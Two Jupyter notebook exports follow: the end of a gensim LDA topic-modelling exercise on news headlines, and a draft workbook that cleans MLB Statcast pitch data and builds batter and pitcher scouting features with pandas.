Topic: 0.022*"closer" + 0.021*"test" + 0.019*"lead" + 0.017*"talk" + 0.014*"south" + 0.013*"law" + 0.012*"take" + 0.012*"timor" + 0.010*"open" + 0.010*"clash"
Words: 0
Topic: 0.092*"polic" + 0.028*"seek" + 0.025*"investig" + 0.022*"miss" + 0.015*"search" + 0.015*"probe" + 0.013*"region" + 0.011*"offic" + 0.011*"bodi" + 0.010*"park"
Words: 1
Topic: 0.016*"record" + 0.014*"break" + 0.014*"australia" + 0.013*"look" + 0.012*"rain" + 0.012*"dead" + 0.012*"drought" + 0.012*"sydney" + 0.012*"price" + 0.010*"fall"
Words: 2
Topic: 0.050*"water" + 0.032*"warn" + 0.019*"urg" + 0.015*"industri" + 0.014*"continu" + 0.013*"farmer" + 0.012*"busi" + 0.011*"begin" + 0.010*"worker" + 0.010*"threat"
Words: 3
Topic: 0.016*"elect" + 0.016*"iraq" + 0.014*"howard" + 0.013*"deal" + 0.013*"labor" + 0.013*"market" + 0.012*"reject" + 0.012*"say" + 0.012*"appeal" + 0.011*"aust"
Words: 4
Topic: 0.040*"charg" + 0.035*"court" + 0.033*"face" + 0.022*"kill" + 0.021*"murder" + 0.021*"accus" + 0.020*"forc" + 0.019*"attack" + 0.016*"case" + 0.013*"trial"
Words: 5
Topic: 0.018*"return" + 0.017*"hold" + 0.014*"question" + 0.014*"work" + 0.013*"resid" + 0.013*"firefight" + 0.011*"blaze" + 0.010*"rais" + 0.010*"battl" + 0.010*"unit"
Words: 6
Topic: 0.038*"crash" + 0.025*"jail" + 0.021*"road" + 0.017*"die" + 0.017*"death" + 0.016*"coast" + 0.013*"year" + 0.013*"driver" + 0.013*"get" + 0.013*"prompt"
Words: 7
Topic: 0.057*"govt" + 0.029*"council" + 0.024*"fund" + 0.023*"plan" + 0.017*"boost" + 0.017*"urg" + 0.012*"defend" + 0.012*"servic" + 0.012*"health" + 0.012*"rise"
Words: 8
Topic: 0.036*"report" + 0.024*"opposit" + 0.023*"power" + 0.014*"win" + 0.013*"final" + 0.012*"state" + 0.012*"say" + 0.012*"compani" + 0.010*"nuclear" + 0.009*"join"
Words: 9
###Markdown
Classification of the topics Using the words in each topic and their corresponding weights, what categories were you able to infer?* 0: * 1: * 2: * 3: * 4: * 5: * 6: * 7: * 8: * 9: Step 4.2 Running LDA using TF-IDF
###Code
'''
Define lda model using corpus_tfidf, again using gensim.models.LdaMulticore()
'''
# TODO
lda_model_tfidf = gensim.models.LdaMulticore(corpus_tfidf,
num_topics = 10,
id2word = dictionary,
passes = 2,
workers = 2)
'''
For each topic, we will explore the words occuring in that topic and its relative weight
'''
for idx, topic in lda_model_tfidf.print_topics(-1):
print("Topic: {} Word: {}".format(idx, topic))
print("\n")
###Output
Topic: 0 Word: 0.010*"england" + 0.009*"tiger" + 0.008*"victori" + 0.008*"climat" + 0.007*"pakistan" + 0.007*"australia" + 0.007*"lead" + 0.006*"world" + 0.006*"iemma" + 0.006*"season"
Topic: 1 Word: 0.011*"timor" + 0.009*"liber" + 0.009*"iraq" + 0.007*"terror" + 0.006*"howard" + 0.006*"troop" + 0.006*"takeov" + 0.006*"lebanon" + 0.006*"quit" + 0.006*"resign"
Topic: 2 Word: 0.016*"search" + 0.014*"miss" + 0.012*"south" + 0.010*"coast" + 0.010*"east" + 0.009*"die" + 0.008*"gold" + 0.008*"crew" + 0.008*"violenc" + 0.006*"crash"
Topic: 3 Word: 0.010*"govt" + 0.009*"region" + 0.009*"plan" + 0.009*"rudd" + 0.008*"fund" + 0.008*"indigen" + 0.008*"labor" + 0.007*"council" + 0.007*"shortag" + 0.006*"urg"
Topic: 4 Word: 0.012*"hick" + 0.011*"firefight" + 0.011*"blaze" + 0.010*"damag" + 0.007*"boat" + 0.007*"costello" + 0.006*"illeg" + 0.006*"alic" + 0.006*"energi" + 0.005*"station"
Topic: 5 Word: 0.027*"closer" + 0.012*"govt" + 0.009*"council" + 0.008*"health" + 0.007*"rise" + 0.007*"plan" + 0.007*"urg" + 0.006*"union" + 0.006*"fund" + 0.006*"opposit"
Topic: 6 Word: 0.015*"water" + 0.011*"drought" + 0.008*"murray" + 0.007*"suppli" + 0.006*"export" + 0.006*"farmer" + 0.006*"recycl" + 0.006*"beach" + 0.006*"legal" + 0.006*"plan"
Topic: 7 Word: 0.013*"nuclear" + 0.010*"guilti" + 0.009*"prompt" + 0.007*"plead" + 0.007*"korea" + 0.007*"polic" + 0.006*"bail" + 0.006*"refus" + 0.006*"iran" + 0.006*"beatti"
Topic: 8 Word: 0.017*"charg" + 0.015*"murder" + 0.012*"jail" + 0.012*"court" + 0.011*"polic" + 0.010*"face" + 0.010*"stab" + 0.009*"assault" + 0.009*"sentenc" + 0.007*"solomon"
Topic: 9 Word: 0.020*"crash" + 0.019*"kill" + 0.019*"polic" + 0.011*"road" + 0.011*"investig" + 0.011*"driver" + 0.009*"fatal" + 0.009*"bomb" + 0.008*"death" + 0.008*"attack"
###Markdown
Classification of the topics As we can see, when using tf-idf, heavier weights are given to words that are not as frequent which results in nouns being factored in. That makes it harder to figure out the categories as nouns can be hard to categorize. This goes to show that the models we apply depend on the type of corpus of text we are dealing with. Using the words in each topic and their corresponding weights, what categories could you find?* 0: * 1: * 2: * 3: * 4: * 5: * 6: * 7: * 8: * 9: Step 5.1: Performance evaluation by classifying sample document using LDA Bag of Words modelWe will check to see where our test document would be classified.
###Code
'''
Text of sample document 4310
'''
processed_docs[4310]
'''
Check which topic our test document belongs to using the LDA Bag of Words model.
'''
document_num = 4310
# Our test document is document number 4310
# TODO
for index, score in sorted(lda_model[bow_corpus[document_num]], key=lambda tup: -1*tup[1]):
print("\nScore: {}\t \nTopic: {}".format(score, lda_model.print_topic(index, 10)))
###Output
Score: 0.553202748298645
Topic: 0.016*"record" + 0.014*"break" + 0.014*"australia" + 0.013*"look" + 0.012*"rain" + 0.012*"dead" + 0.012*"drought" + 0.012*"sydney" + 0.012*"price" + 0.010*"fall"
Score: 0.28677472472190857
Topic: 0.050*"water" + 0.032*"warn" + 0.019*"urg" + 0.015*"industri" + 0.014*"continu" + 0.013*"farmer" + 0.012*"busi" + 0.011*"begin" + 0.010*"worker" + 0.010*"threat"
Score: 0.020009001716971397
Topic: 0.092*"polic" + 0.028*"seek" + 0.025*"investig" + 0.022*"miss" + 0.015*"search" + 0.015*"probe" + 0.013*"region" + 0.011*"offic" + 0.011*"bodi" + 0.010*"park"
Score: 0.020004812628030777
Topic: 0.018*"return" + 0.017*"hold" + 0.014*"question" + 0.014*"work" + 0.013*"resid" + 0.013*"firefight" + 0.011*"blaze" + 0.010*"rais" + 0.010*"battl" + 0.010*"unit"
Score: 0.0200041513890028
Topic: 0.057*"govt" + 0.029*"council" + 0.024*"fund" + 0.023*"plan" + 0.017*"boost" + 0.017*"urg" + 0.012*"defend" + 0.012*"servic" + 0.012*"health" + 0.012*"rise"
Score: 0.020001856610178947
Topic: 0.022*"closer" + 0.021*"test" + 0.019*"lead" + 0.017*"talk" + 0.014*"south" + 0.013*"law" + 0.012*"take" + 0.012*"timor" + 0.010*"open" + 0.010*"clash"
Score: 0.020001748576760292
Topic: 0.038*"crash" + 0.025*"jail" + 0.021*"road" + 0.017*"die" + 0.017*"death" + 0.016*"coast" + 0.013*"year" + 0.013*"driver" + 0.013*"get" + 0.013*"prompt"
Score: 0.02000090852379799
Topic: 0.016*"elect" + 0.016*"iraq" + 0.014*"howard" + 0.013*"deal" + 0.013*"labor" + 0.013*"market" + 0.012*"reject" + 0.012*"say" + 0.012*"appeal" + 0.011*"aust"
Score: 0.020000092685222626
Topic: 0.036*"report" + 0.024*"opposit" + 0.023*"power" + 0.014*"win" + 0.013*"final" + 0.012*"state" + 0.012*"say" + 0.012*"compani" + 0.010*"nuclear" + 0.009*"join"
Score: 0.020000003278255463
Topic: 0.040*"charg" + 0.035*"court" + 0.033*"face" + 0.022*"kill" + 0.021*"murder" + 0.021*"accus" + 0.020*"forc" + 0.019*"attack" + 0.016*"case" + 0.013*"trial"
###Markdown
It has the highest probability (`x`) to be part of the topic that we assigned as X, which is the accurate classification. Step 5.2: Performance evaluation by classifying sample document using LDA TF-IDF model
###Code
'''
Check which topic our test document belongs to using the LDA TF-IDF model.
'''
# Our test document is document number 4310
for index, score in sorted(lda_model_tfidf[bow_corpus[document_num]], key=lambda tup: -1*tup[1]):
print("\nScore: {}\t \nTopic: {}".format(score, lda_model_tfidf.print_topic(index, 10)))
###Output
Score: 0.8199763894081116
Topic: 0.015*"water" + 0.011*"drought" + 0.008*"murray" + 0.007*"suppli" + 0.006*"export" + 0.006*"farmer" + 0.006*"recycl" + 0.006*"beach" + 0.006*"legal" + 0.006*"plan"
Score: 0.020008740946650505
Topic: 0.016*"search" + 0.014*"miss" + 0.012*"south" + 0.010*"coast" + 0.010*"east" + 0.009*"die" + 0.008*"gold" + 0.008*"crew" + 0.008*"violenc" + 0.006*"crash"
Score: 0.020004352554678917
Topic: 0.013*"nuclear" + 0.010*"guilti" + 0.009*"prompt" + 0.007*"plead" + 0.007*"korea" + 0.007*"polic" + 0.006*"bail" + 0.006*"refus" + 0.006*"iran" + 0.006*"beatti"
Score: 0.02000252529978752
Topic: 0.027*"closer" + 0.012*"govt" + 0.009*"council" + 0.008*"health" + 0.007*"rise" + 0.007*"plan" + 0.007*"urg" + 0.006*"union" + 0.006*"fund" + 0.006*"opposit"
Score: 0.0200019683688879
Topic: 0.010*"govt" + 0.009*"region" + 0.009*"plan" + 0.009*"rudd" + 0.008*"fund" + 0.008*"indigen" + 0.008*"labor" + 0.007*"council" + 0.007*"shortag" + 0.006*"urg"
Score: 0.020001957193017006
Topic: 0.012*"hick" + 0.011*"firefight" + 0.011*"blaze" + 0.010*"damag" + 0.007*"boat" + 0.007*"costello" + 0.006*"illeg" + 0.006*"alic" + 0.006*"energi" + 0.005*"station"
Score: 0.020001888275146484
Topic: 0.020*"crash" + 0.019*"kill" + 0.019*"polic" + 0.011*"road" + 0.011*"investig" + 0.011*"driver" + 0.009*"fatal" + 0.009*"bomb" + 0.008*"death" + 0.008*"attack"
Score: 0.020001139491796494
Topic: 0.011*"timor" + 0.009*"liber" + 0.009*"iraq" + 0.007*"terror" + 0.006*"howard" + 0.006*"troop" + 0.006*"takeov" + 0.006*"lebanon" + 0.006*"quit" + 0.006*"resign"
Score: 0.020000556483864784
Topic: 0.017*"charg" + 0.015*"murder" + 0.012*"jail" + 0.012*"court" + 0.011*"polic" + 0.010*"face" + 0.010*"stab" + 0.009*"assault" + 0.009*"sentenc" + 0.007*"solomon"
Score: 0.020000483840703964
Topic: 0.010*"england" + 0.009*"tiger" + 0.008*"victori" + 0.008*"climat" + 0.007*"pakistan" + 0.007*"australia" + 0.007*"lead" + 0.006*"world" + 0.006*"iemma" + 0.006*"season"
###Markdown
It has the highest probability (`x%`) to be part of the topic that we assigned as X. Step 6: Testing model on unseen document
###Code
unseen_document = "My favorite sports activities are running and swimming."
# Data preprocessing step for the unseen document
bow_vector = dictionary.doc2bow(preprocess(unseen_document))
for index, score in sorted(lda_model[bow_vector], key=lambda tup: -1*tup[1]):
print("Score: {}\t Topic: {}".format(score, lda_model.print_topic(index, 5)))
###Output
Score: 0.4200000762939453 Topic: 0.022*"closer" + 0.021*"test" + 0.019*"lead" + 0.017*"talk" + 0.014*"south"
Score: 0.2199999839067459 Topic: 0.018*"return" + 0.017*"hold" + 0.014*"question" + 0.014*"work" + 0.013*"resid"
Score: 0.2199920117855072 Topic: 0.040*"charg" + 0.035*"court" + 0.033*"face" + 0.022*"kill" + 0.021*"murder"
Score: 0.020004048943519592 Topic: 0.038*"crash" + 0.025*"jail" + 0.021*"road" + 0.017*"die" + 0.017*"death"
Score: 0.02000385895371437 Topic: 0.036*"report" + 0.024*"opposit" + 0.023*"power" + 0.014*"win" + 0.013*"final"
Score: 0.019999999552965164 Topic: 0.092*"polic" + 0.028*"seek" + 0.025*"investig" + 0.022*"miss" + 0.015*"search"
Score: 0.019999999552965164 Topic: 0.016*"record" + 0.014*"break" + 0.014*"australia" + 0.013*"look" + 0.012*"rain"
Score: 0.019999999552965164 Topic: 0.050*"water" + 0.032*"warn" + 0.019*"urg" + 0.015*"industri" + 0.014*"continu"
Score: 0.019999999552965164 Topic: 0.016*"elect" + 0.016*"iraq" + 0.014*"howard" + 0.013*"deal" + 0.013*"labor"
Score: 0.019999999552965164 Topic: 0.057*"govt" + 0.029*"council" + 0.024*"fund" + 0.023*"plan" + 0.017*"boost"
|
Work in progress/cleaning_workbook.ipynb | ###Markdown
Import Install Packages Import Packages
###Code
import pandas as pd
import numpy as np
import random
###Output
_____no_output_____
###Markdown
Import Data
###Code
filenames = [str(i) + '.pkl' for i in range(2010,2019)]
seasons = ['df_' + str(i) for i in range(10,19)]
season_dataframes = {}
for i in list(zip(filenames, seasons)):
path = "Season_pickles/" + i[0]
season_dataframes[i[1]] = pd.read_pickle(path, compression='zip')
###Output
_____no_output_____
###Markdown
Concatenate Data
###Code
pitches = pd.concat(season_dataframes.values())
###Output
_____no_output_____
###Markdown
Clean All Instances **Issue**: There are some instances where no data is recorded**Solution**: Drop these instances from the data
###Code
pitches = pitches.dropna(axis = 0, how = 'all')
###Output
_____no_output_____
###Markdown
--- Pitch Type **Feature Name**: `pitch_type`**Feature Description**: The type of pitch derived from Statcast. **Issue**: Feature is supposed to contain a 2 character string, but many values (265) are filled with long strings of numerical characters. Example: 160421_181540**Solution**: Replace values longer than 2 characters in lengeth with np.NaN
###Code
pitches['pitch_type'] = pitches.apply(
lambda row: np.NaN\
if len(str(row['pitch_type'])) > 2\
else row['pitch_type'], axis = 1)
###Output
_____no_output_____
###Markdown
**Issue**: Many values of this feature are recorded as 'UN'**Solution**: Replace value with np.NaN
###Code
pitches['pitch_type'] = pitches['pitch_type'].replace({'UN':np.nan})
###Output
_____no_output_____
###Markdown
**Issue**: The pitch type feature is filled with NaN values**Solution**: We will create a mapping of a pitcher's ID to his normalized pitch counts. Using these normalized values as weights we will select a random pitch type and fill the NaN value for that pitcher. We will use df.apply; this could be time optimized with vectorization, and a lighter alternative restricted to the null rows is sketched after the fill below.
###Code
# Create mapping
# List fo unique pitcher ID's
pitcher_list = pitches['pitcher'].unique().tolist()
pitcher_dict = {}
for pitcher in pitcher_list:
# Pitcher's prior pitch type probabilites
pitch_type_weights = pitches[pitches.pitcher == pitcher]\
.pitch_type\
.value_counts(normalize=True)
pitcher_dict[pitcher] = pitch_type_weights.to_dict()
# Fill nan values
pitcher_dict = pd.DataFrame(pitcher_dict).fillna(0).to_dict()
# Select replacement pitch type and fill NaN values
def pick_a_pitch(pitcher_id):
"""
Returns a random pitch type label
Uses pitchers prior pitch type probabilites as weights
"""
population = list(pitcher_dict[pitcher_id].keys())
weights = list(pitcher_dict[pitcher_id].values())
return random.choices(population, weights, k=1)[0]
# Iterate by instance, fill null values
pitches['pitch_type'] = pitches.apply(
lambda row: pick_a_pitch(row['pitcher']) \
if pd.isnull(row['pitch_type']) \
else row['pitch_type'], axis = 1)
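# Alternative sketch (same result, less work): instead of applying the lambda to
# every row, restrict the fill to rows whose pitch_type is still missing and map
# pick_a_pitch over the 'pitcher' column. At this point the NaNs are already
# filled above, so these two lines are effectively a no-op left as an illustration.
null_mask = pitches['pitch_type'].isnull()
pitches.loc[null_mask, 'pitch_type'] = pitches.loc[null_mask, 'pitcher'].map(pick_a_pitch)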
pitch_type_map = {'FA':'fastball', 'FF':'fastball', 'FT':'fastball', 'FC':'fastball',
'FS':'fastball', 'SI':'fastball', 'SF':'fastball', 'SL':'breaking',
'CB':'breaking', 'CU':'breaking', 'SC':'breaking', 'KC':'breaking',
'CH':'offspeed', 'KN':'offspeed', 'EP':'offspeed', 'FO':'breaking',
'PO':'pitchout', 'IN':'pitchout'}
pitches['pitch_subtype'] = pitches['pitch_type']
pitches['pitch_type'] = pitches['pitch_type'].map(pitch_type_map)
###Output
_____no_output_____
###Markdown
--- Count **Feature**: Count status**Description**: The balls and strikes count for the current at bat **Issue**: There are two existing features related to the count. We need to represent the count as a categorical feature.**Solution**: Classify the pitcher's position regarding the count (Ahead, Behind, Neutral)
###Code
pitches['balls'] = pitches['balls'].replace({4:3, 5:3})
pitches['count_status'] = pitches['balls'].astype('int').astype('str')\
+ pitches['strikes'].astype('int').astype('str')
count_status_mapping = {
'00':'neutral', '21':'neutral', '32':'neutral', '10':'behind',
'20':'behind', '30':'behind', '31':'behind', '01':'ahead',
'02':'ahead', '11':'ahead', '12':'ahead', '22':'ahead'
}
pitches['count_status'] = pitches['count_status'].map(count_status_mapping)
###Output
_____no_output_____
###Markdown
--- Score Differential **Feature**: Score Differential**Description**: The absolute value of the difference in home team score and away team score
###Code
pitches['score_differential'] = abs(pitches['home_score'] - pitches['away_score'])
###Output
_____no_output_____
###Markdown
--- Bases Loaded **Feature**: Bases Loaded**Description**: A binary indication of the bases being loaded or not
###Code
pitches['on_1b'] = pitches['on_1b'] * 0 + 1
pitches['on_1b'] = pitches['on_1b'].fillna(0)
pitches['on_2b'] = pitches['on_2b'] * 0 + 1
pitches['on_2b'] = pitches['on_2b'].fillna(0)
pitches['on_3b'] = pitches['on_3b'] * 0 + 1
pitches['on_3b'] = pitches['on_3b'].fillna(0)
pitches['bases_loaded'] = pitches['on_1b'] + pitches['on_2b'] + pitches['on_3b']
pitches['bases_loaded'] = pitches['bases_loaded'].apply(lambda x: 1 if x == 3 else 0)
###Output
_____no_output_____
###Markdown
--- Swung **Feature**: swung**Description**: Binary feature describing whether or not the batter swung at the pitch
###Code
swung = ['foul','hit_into_play','swinging_strike','hit_into_play_no_out',
'hit_into_play_score','foul_tip','swinging_strike_blocked',
'foul_bunt','missed_bunt']
pitches['batter_swung'] = pitches['description'].apply(lambda x: 1 if x in swung else 0)
pitches['ball_high'] = pitches['plate_z'] > pitches['sz_top']
pitches['ball_low'] = pitches['plate_z'] < pitches['sz_bot']
pitches['ball_left'] = pitches['plate_x'].apply(lambda x: x < -0.73)
pitches['ball_right'] = pitches['plate_x'].apply(lambda x: x > 0.73)
pitches['in_strikezone'] = (pitches['ball_high'].astype(int)
+ pitches['ball_low'].astype(int)
+ pitches['ball_left'].astype(int)
+ pitches['ball_right'].astype(int))
pitches['in_strikezone'] = pitches['in_strikezone'].apply(
lambda x: 0
if x > 0
else 1)
pitches['chased'] = pitches['batter_swung'] - pitches['in_strikezone']
pitches['chased'] = pitches['chased'].apply(lambda x: 1 if x == 1 else 0)
###Output
_____no_output_____
###Markdown
Batters Data
###Code
sample_batter = list(pitches['batter'].unique())[0]
sample_batter
batter_df = pitches[pitches['batter'] == sample_batter]
batter_df.head()
next_probs = batter_df.groupby('pitch_type').size().div(len(batter_df))
next_probs
batter_df['pitch_type'].value_counts(normalize = True).to_dict()
pd.DataFrame(batter_df.groupby(['pitch_type', 'chased']).size().div(len(batter_df)).div(next_probs, axis=0, level='pitch_type'))
batter_dict = {}
pitch_types = pitches['pitch_type'].unique().tolist()
pitch_type_percentages = batter_df['pitch_type'].value_counts(normalize=True)
for pitch_type in pitch_types:
batter_dict[pitch_type + '_perc_faced'] = pitch_type_percentages[pitch_type] * 100
batter_dict
for pitch_type in pitch_types:
cat_df = batter_df[batter_df['pitch_type'] == pitch_type]
out_of_strikezone = len(cat_df) - cat_df['in_strikezone'].sum()
chased_count = cat_df['chased'].sum()
chase_perc = (chased_count / out_of_strikezone) * 100
batter_dict[pitch_type + '_chase_perc'] = chase_perc
ball_in_play_count = len(cat_df[cat_df['type'] == 'X'])
swung_count = cat_df['batter_swung'].sum()
batter_dict[pitch_type + '_bip_swung_perc'] = (ball_in_play_count / swung_count) * 100
batter_dict
# calc ball in play % for each swing for each pitch category
for pitch_type in pitch_types:
    # subset the batter's pitches for this pitch category
    cat_df = batter_df[batter_df['pitch_type'] == pitch_type]
    ball_in_play_count = len(cat_df[cat_df['type'] == 'X'])  # type X means ball hit into play
    swung_count = cat_df['batter_swung'].sum()               # counts all the 1s in the swung column
    # assign the ball in play % per swing to the batter dict
    batter_dict[pitch_type + '_bip_swung_perc'] = (ball_in_play_count / swung_count) * 100
def make_batters_df(prior_df):
df = prior_df.copy()
#make list of the unique batter ids
batters = list(df['batter'].unique())
#initialize empty dictionary to store the batter stats
batters_dict = {}
#set a break flag to False for error-checking
brk = False
#iterate thru each unique batter
for batter in batters:
if brk:
break
#make subset of the df for that batter and assign to variable batter_df
batter_df = df[df['batter'] == batter]
#assign all pitch categories to list:
all_pitch_cats = ['fastball', 'breaking', 'offspeed', 'pitchout']
#assign the pitch categories to a list
try:
pitch_cats = batter_df['pitch_type'].unique().tolist()
except KeyError:
print(batter)
brk = True
#get the normalized value counts of pitches by category that batter has faced
vc = batter_df['pitch_type'].value_counts(normalize=True)
#initialize empty dict for each batter
batter_dict = {}
#if there are any pitch categories the batter has not faced,
unfaced_cats = list(set(all_pitch_cats) - set(pitch_cats))
for cat in pitch_cats:
if brk:
break
#assign the % of pitches faced by the batter for that category to his batter dict
try:
batter_dict[cat + '_perc_faced'] = vc[cat] * 100
except TypeError:
print(batter)
return 1
#continue out of the loop for pitchout category since ball in play stats are NaN
if cat == 'pitchout':
continue
#grab subset of batter df for the pitch category
cat_df = batter_df[batter_df['pitch_type'] == cat]
#if he has faced less than 100 pitches of that type, add it to unfaced_category and fill w NaN
if len(cat_df) < 100:
unfaced_cats.append(cat)
continue
#calculate batters chase % for pitch type category on balls outside the strikezone
out_of_strikezone = len(cat_df) - cat_df['in_strikezone'].sum() #num of times ball was out of zone
chased_count = cat_df['chased'].sum() #num of times batter chased
try:
chase_perc = (chased_count / out_of_strikezone) * 100
except ZeroDivisionError:
chase_perc = np.nan
#assign the chase perc to the batter dict
batter_dict[cat + '_chase_perc'] = chase_perc
#calc ball in play % for each swing for each pitch cat:
ball_in_play_count = len(cat_df[cat_df['type'] == 'X']) #type X means ball hit into play
swung_count = cat_df['batter_swung'].sum() #counts all the 1s in the swung column
#assign the ball in play % per swing to the batter dict
batter_dict[cat + '_bip_swung_perc'] = (ball_in_play_count / swung_count) * 100
#calculate taken strike %
taken_strike_count = len(cat_df[(cat_df['in_strikezone'] == 1) & (cat_df['batter_swung'] == 0)])
pitches_in_zone_count = cat_df['in_strikezone'].sum() #counts the 1s in the in zone col
#assign to batter_dict
batter_dict[cat + '_taken_strike_perc'] = (taken_strike_count / pitches_in_zone_count) * 100
#for each pitch type category, get the batters stats on balls hit in play
stats = ['estimated_woba_using_speedangle', 'babip_value', 'iso_value']
for stat in stats:
#drop Nans from the stat column and assign to new subset, for each stat
stat_cat_df = cat_df.dropna(subset=[stat])
if stat == 'estimated_woba_using_speedangle':
#get the mean avg_est_woba
avg_est_woba = stat_cat_df['estimated_woba_using_speedangle'].mean()
#assign that value to the batters dictionary
batter_dict[cat + '_est_woba'] = avg_est_woba
if avg_est_woba == np.nan:
print(batter)
brk = True
break
elif stat == 'babip_value':
avg_babip = stat_cat_df['babip_value'].mean()
batter_dict[cat + '_babip'] = avg_babip
else:
avg_iso_value = stat_cat_df['iso_value'].mean()
batter_dict[cat + '_iso_value'] = avg_iso_value
#for unfaced or small sample pitch_types: assign NaNs to his dictionary for that category
for cat in unfaced_cats:
if cat == 'pitchout':
batter_dict[cat + '_perc_faced'] = 0
else:
batter_dict[cat + '_perc_faced'] = np.nan
batter_dict[cat + '_chase_perc'] = np.nan
batter_dict[cat + '_bip_swung_perc'] = np.nan
batter_dict[cat + '_taken_strike_perc'] = np.nan
batter_dict[cat + '_est_woba'] = np.nan
batter_dict[cat + '_babip'] = np.nan
batter_dict[cat + '_iso_value'] = np.nan
#assign the batter dictionary to the main dictionary of all batters
batters_dict[batter] = batter_dict
if not brk:
print('iteration completed successfully')
#make df from the batters dict
batters_df = pd.DataFrame.from_dict(batters_dict, orient='index')
batters_df = batters_df.reset_index().rename(columns={'index':'batter'})
return batters_df
batters_df = make_batters_df(pitches)
batters_df.head()
def downcast_dtypes(df):
df = df.copy()
int_cols = df.select_dtypes('int').columns.tolist()
float_cols = df.select_dtypes('float').columns.tolist()
obj_cols = df.select_dtypes('object').columns.tolist()
cat_cols = []
for col in obj_cols:
if col == 'pitch_type':
continue
if len(df[col].unique()) < len(df)/2:
cat_cols.append(col)
ints = df[int_cols].apply(pd.to_numeric,downcast='unsigned')
floats = df[float_cols].apply(pd.to_numeric,downcast='float')
cats = df[cat_cols].astype('category')
df = df.drop(columns=int_cols + float_cols + cat_cols)
for d in [ints, floats, cats]:
df = pd.concat([df, d], axis=1)
return df
def pre_process_step1(combined):
df = combined.copy()
#convert the pitch type for UN (unknown) to np.nan
df['pitch_type'] = df['pitch_type'].replace({'UN':np.nan})
#fix some faulty data that has number of balls listed as 4:
df['balls'] = df['balls'].replace({4.0: 3.0})
#count, count_cat, score_diff, on_base 1/0, bases_loaded
df = make_game_features(df)
#batter_swung, in_strikezone, chased
df = make_strikezone_swung_and_chase_features(df)
#get aggregate pitcher %s dict from prior data:
pitcher_dict = gen_pitcher_percentages(df)
#fil the NaNs for pitch_type using randomized guess from pitcher tendencies
df = fill_pitch_type_nans(df, pitcher_dict)
#pitch_type category feature
df = make_pitch_type_cat(df)
return df
#pass in list of periods to update the data (and fill NaNs) using prior aggregates:
def pre_process_step2(pre_processed_step1, start_dates, end_dates):
df = pre_processed_step1.copy()
#initialize empty list to store dfs (concat them together later)
df_list = []
#iterate over each period
for i in range(len(start_dates)):
#make the prior and current dfs:
prior_df = df[df['game_date'] < start_dates[i]]
current_df = df[(df['game_date'] >= start_dates[i]) & (df['game_date'] <= end_dates[i])]
#add the batter scouting report
batters_df = make_batters_df(prior_df)
current_df = pd.merge(current_df, batters_df, how='left', on='batter')
#append the df to the list
df_list.append(current_df)
step2_df = pd.concat(df_list, sort=False)
return step2_df
def get_pitch_tendencies(pitcher_df):
#assign the normalized value counts for this pitchers pitch types to a dictionary
pitcher_tendencies_overall = pitcher_df['pitch_type'].value_counts(normalize=True).to_dict()
#initialize empty dict for count categories tendencies
pitcher_tendencies_by_count = {}
#loop over each count category and get the pitchers tendencies and add to the dict
for cat in pitcher_df['count_cat'].unique().tolist():
subset = pitcher_df[pitcher_df['count_cat'] == cat]
pitcher_tendencies_by_count[cat] = subset['pitch_type'].value_counts(normalize=True).to_dict()
return pitcher_tendencies_overall, pitcher_tendencies_by_count
def make_tendency_features(pitcher_df, pitcher_tendencies_overall, pitcher_tendencies_by_count):
df = pitcher_df.copy()
pitch_types = pitcher_tendencies_overall.keys()
for pitch_type in pitch_types:
overall_feature = 'overall_' + pitch_type + '_perc'
count_cat_feature = 'count_cat_' + pitch_type + '_perc'
def get_overall_perc(x):
return pitcher_tendencies_overall[x]
def get_by_count_perc(x):
try:
return pitcher_tendencies_by_count[x][pitch_type]
except KeyError:
return 0
df[overall_feature] = pitch_type
df[overall_feature] = df[overall_feature].apply(get_overall_perc)
df[count_cat_feature] = df['count_cat'].apply(get_by_count_perc)
return df
start_dates = ['2018-03-29', '2018-05-01', '2018-06-01', '2018-07-01', '2018-08-01',
'2018-09-01', '2019-03-28', '2019-05-01', '2019-06-01', '2019-07-01',
'2019-08-01']
end_dates = ['2018-04-30', '2018-05-31', '2018-06-30', '2018-07-31', '2018-08-31',
'2018-10-01', '2019-04-30', '2019-05-31', '2019-06-30', '2019-07-31',
'2019-08-31']
def add_pitcher_scouting_report(pitcher_df, pitcher_df17, start_dates, end_dates):
df = pd.concat([pitcher_df, pitcher_df17], sort=False)
#initialize empty list to store dfs (concat them together later)
df_list = []
#iterate over each period
for i in range(len(start_dates)):
#make the prior and current dfs:
prior_df = df[df['game_date'] < start_dates[i]]
current_df = df[(df['game_date'] >= start_dates[i]) & (df['game_date'] <= end_dates[i])]
#get the pitch tendencies from prior:
pitcher_tendencies_overall, pitcher_tendencies_by_count = get_pitch_tendencies(prior_df)
#make the pitch tendencies features on current:
current_df = make_tendency_features(current_df, pitcher_tendencies_overall, pitcher_tendencies_by_count)
#append the df to the list
df_list.append(current_df)
df = pd.concat(df_list, sort=False)
return df
def make_game_batting_order(game_df):
game_df = game_df.sort_values(by=['at_bat_number', 'pitch_number'])
all_batters = game_df['batter'].unique().tolist()
#re-set the at_bat_number for the game to be sequential starting at 1
at_bat_keys = game_df['at_bat_number'].unique().tolist()
at_bat_values = range(1, len(at_bat_keys)+1)
at_bat_map = dict(zip(at_bat_keys, at_bat_values))
game_df['at_bat_number'] = game_df['at_bat_number'].replace(at_bat_map)
#get the first 9 batter ids
first_9_batter_subset = game_df[game_df['at_bat_number'] < 10]
first_9_batters = first_9_batter_subset['batter'].unique().tolist()
#map the batter id to batting order position 1-9
batting_order_map = dict(zip(first_9_batters, range(1,10)))
#for anyone else who bats later in the game, assign 'PH' (pinch hitter) to their batting order slot
other_batters = list(set(all_batters) - set(first_9_batters))
if len(other_batters) > 0:
for batter in other_batters:
batting_order_map[batter] = 'PH'
try:
game_df['batting_order_slot'] = game_df['batter'].apply(lambda x: batting_order_map[x])
except KeyError:
game_df = None
return game_df
game_df['pitcher_AB'] = game_df['batter'].apply(lambda x: True if x in pitcher_list else False)
game_df['batting_order_slot'] = game_df['batting_order_slot'].where(game_df['pitcher_AB'] == False, other='pitcher')
return game_df
def make_game_pitchcount_and_trailing_pitch_features(pitcher_df, pitcher_list):
df = pitcher_df.copy()
print('#pitches in df before: ' + str(len(df)))
pitcher_tendencies_overall, pitcher_tendencies_by_count = get_pitch_tendencies(df)
games = df['game_pk'].unique().tolist()
#take the first game and make the pitch count feature
first_game_df = df[df['game_pk'] == games[0]].copy()
first_game_df['pitch_count'] = range(1, first_game_df.shape[0] + 1)
#make the L1_pitch type feature:
first_game_df['L1_pitch_type'] = first_game_df['pitch_type'].shift(periods=1)
first_game_df['L1_pitch_result'] = first_game_df['type'].shift(periods=1)
